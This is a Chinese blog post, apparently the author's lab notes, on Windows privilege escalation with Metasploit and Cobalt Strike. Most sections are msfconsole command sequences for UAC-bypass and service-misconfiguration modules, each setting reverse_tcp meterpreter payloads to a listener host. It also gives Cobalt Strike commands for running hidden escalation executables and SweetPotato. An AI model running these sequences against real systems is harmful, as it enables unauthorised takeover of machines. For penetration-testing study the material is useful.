MSFandCS模块提权

admin 2021年8月27日14:40:29评论173 views字数 4408阅读14分41秒阅读模式

/01 Metasploit提权模块

一,Meterpreter提权

1.Meterpreter自动提权命令

查看当权权限:

1
getuid

Meterpreter自动提权命令:

1
getsystem

当以普通用户输入:

image-20201210191722360

image-20201210191710067

当用管理员运行输入:

image-20201210191901790

2.提权命令执行失败,绕过uac

2.1 bypassuac模块

当没有勇管理员运行时可用使用。

1
2
3
4
5
6
7
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/bypassuac) > set session 5
session => 5
msf6 exploit(windows/local/bypassuac) > exploit

image-20201210193803750

image-20201210193822203

image-20201210194209852

2.2bypassuac_injection

1
2
3
4
5
6
7
8
9
10
11
12
msf6 exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_injection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/bypassuac_injection) > set lport 6667
lport => 6667
msf6 exploit(windows/local/bypassuac_injection) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_injection) > exploit

image-20201211134236415

Tips:

测试了很多次注意payload设置要与对方机器一致且target也要一致而不是根据我们本来的连接设置

3.windows-kernel-exploits(Windows平台提权漏洞集合):

https://github.com/SecWiki/windows-kernel-exploits

1
2
3
4
msf6  > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

image-20201210214443704

4.bypassuac_eventvwr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf6 exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.11.11 yes The listen address (an interface may be specified)
LPORT 6699 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows x86


msf6 exploit(windows/local/bypassuac_eventvwr) > run

image-20201211141315676

这个模块就很玄学了只能勇x86位的攻击载荷和target

二,unquoted_service_path模块

1
2
3
4
5
6
7
msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/unquoted_service_path
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/unquoted_service_path) > run

image-20201211140248170

三,service_permissions模块

1
2
3
4
5
6
7
8
9
msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/service_permissions) > set session 3
session => 3
msf6 exploit(windows/local/service_permissions) > run

image-20201211135912715

未能找出薄弱服务

四,always_install_elevated模块

1
2
3
4
5
6
7
8
9
msf6 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/always_install_elevated
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/always_install_elevated) > set session 3
session => 3
msf6 exploit(windows/local/always_install_elevated) > run

image-20201211135411991

五,Other

https://www.freebuf.com/articles/system/184289.html

/02 CobaltStrike提权模块

一,Elevate

方法大致是网上下大佬写好的一些提权脚本,然后安装,对已有普通用户权限的机器右击运行elevate

image-20201211145155910

image-20201211151928301

上面一个是选择监听者,下面是运行提权脚本可用手动添加

二,自用提权EXE

原理是下载好提权exe,上传至需要提权的机器,然后远程运行命令为

1
execute -Hc -f XXXX.exe

其中-H隐藏命令提示,-c重定向输入输出 -f指定运行软件

三,Powershell

运行提权powershell提权脚本,

1
2
3
4
5
6
#配置策略
powershell Invoke-ALLChecks

help powershell-import
use:
powershell-import [/path/to/local/script.ps1]

四,为CS添加拓展程序,如SweetPotato

1
beacon> elevate SweetPotato https

没有加载就是:

image-20201211152839488

Tip:

相比MSF和CS的提权手段,我更倾向与MSF因为它更全面而且不用自动去下载,当然是那种会写提权脚本而且有丰富的提权脚本库的当我没说。

暴露了我一个问题CS使用不熟练,可能是使用的少的原因,平常大部分使用的都是msf,cs使用的很少,但是在团队协作时最好两个偶会点,有空我会恶补的。

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 宽字节注入

宽字节由于编码的不同存在用两个字节显示一个字的编码格式,如GB2312,GBK,GB18030,BIG5等 当我们将解析编码为宽字节时,我们可用构造互溶”/“的字符,借此绕过转义。 宽字节注入一般SQL注入的防范会通过转义如用户输入“'”转义为"'"从而阻止’…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日14:40:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSFandCS模块提权https://cn-sec.com/archives/475138.html

发表评论

匿名网友 填写信息